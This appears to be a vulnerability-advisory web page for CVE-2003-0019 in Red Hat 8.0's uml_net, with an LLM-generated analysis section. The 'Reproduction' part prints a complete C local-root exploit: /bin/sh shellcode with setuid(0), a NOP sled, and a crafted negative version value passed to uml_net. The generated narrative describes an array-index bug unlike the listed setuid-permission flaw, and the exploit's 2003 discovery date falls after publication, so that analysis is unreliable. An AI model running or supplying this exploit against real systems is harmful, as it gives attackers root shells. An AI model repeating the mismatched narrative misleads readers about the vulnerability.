VYPR
← All advisories
Unrated severityNVD Advisory· Published Feb 19, 2003· Updated Jun 16, 2026

CVE-2003-0019

CVE-2003-0019

Description

uml_net in the kernel-utils package for Red Hat Linux 8.0 has incorrect setuid root privileges, which allows local users to modify network interfaces, e.g. by modifying ARP entries or placing interfaces into promiscuous mode.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Affected products

2

Patches

Vulnerability mechanics

Root cause

"The uml_net utility mishandles version information, allowing an attacker to execute arbitrary code with root privileges."

Attack vector

A local attacker can exploit this vulnerability by supplying a negative value for the version information to the uml_net utility. This negative value causes an invalid index into an array of functions, leading to the execution of attacker-controlled code. Successful exploitation allows arbitrary command execution with the privileges of uml_net, which is typically root [ref_id=1].

Affected code

The vulnerability exists in the uml_net utility, specifically within its handling of version information. The exploit code targets a flaw in `uml_net.c` where a negative value for version information can lead to an invalid array index and subsequent code execution [ref_id=1].

What the fix does

The advisory does not specify a patch or provide remediation guidance. Therefore, the exact fix is not detailed. However, the vulnerability stems from integer mismanagement in handling version information, suggesting that proper validation of this input would mitigate the issue.

Preconditions

  • authThe attacker must have local access to the affected system.
  • inputThe attacker must be able to execute the `uml_net` utility with a crafted negative version value.

Reproduction

``` # uml_net proof of concept exploit

# Tested on: RH 8.0 with default uml_utilities from kernel-utils-2.4-8.13 # RH 8.0 with binary from uml_utilities_20030312, uml_utilities_20020821 # It may work on other linux distributions

# Author: ktha@hushmail.com # Based on the bug that I found in uml_net.c on 23.05.2003

# Greets: M|G - no1 keep up the good work # securitech guys, security-corp guys - thx for the challenges # all of you who support me in real life

#include <stdio.h>

#define SHELL 0xbffffdd7 #define ROT -302068188

char * gen (int pad) { int i, size; char *p; char shellcode[] = "\x31\xc0" // xorl %eax,%eax "\x31\xdb" // xorl %ebx,%ebx "\xb0\x17" // movb $0x17,%al "\xcd\x80" // int $0x80 "\xeb\x18" // jmp end // start: "\x5e" // popl %esi "\x89\x76\x08" // movl %esi,0x8(%esi) "\x31\xc0" // xorl %eax,%eax "\x88\x46\x07" // movb %eax,0x7(%esi) "\x89\x46\x0c" // movl %eax,0xc(%esi) "\xb0\x0b" // movb $0xb,%al "\x89\xf3" // movl %esi,%ebx "\x8d\x4e\x08" // leal 0x8(%esi),%ecx "\x8d\x56\x0c" // leal 0xc(%esi),%edx "\xcd\x80" // int $0x80 // end: "\xe8\xe3\xff\xff\xff" // call start "\x2f\x62\x69\x6e\x2f\x73\x68"; // .string "/bin/sh"

size = sizeof (shellcode); p = (char *) malloc (5000 + size + 1); memset (p, 0x90, 5000); for (i = 1; i < 1000; i++) *(int *) (p + 4 * i + pad) = SHELL; memcpy (p + 5000, shellcode, size + 1); *p = "SM00NY="; return p; }

void usage (char *sir) { printf ("\nUsage: %s <UML_NET> [pad]\n\n", sir); printf ("Pad value: 0 - 3\nDefault: 0\n"); printf ("\n"); } main (int argc, char **argv) { unsigned long pad = 0; int loop; char s[1000]; char *nume[4], *pume[2];

if (argc < 2) { usage (argv[0]); exit (0); }

if (argv[2]) pad = atoi (argv[2]);

sprintf (s, "%d", ROT);

nume[0] = argv[1]; nume[1] = s; nume[2] = "add"; nume[3] = NULL;

pume[0] = gen (pad); pume[1] = NULL;

printf ("Trying to exploit.... pad value: %d\n", pad); printf ("If you get a segfault, try to change the pad value !\n");

execve (nume[0], nume, pume); } ```

Generated on Jun 2, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

5

News mentions

0

No linked articles in our index yet.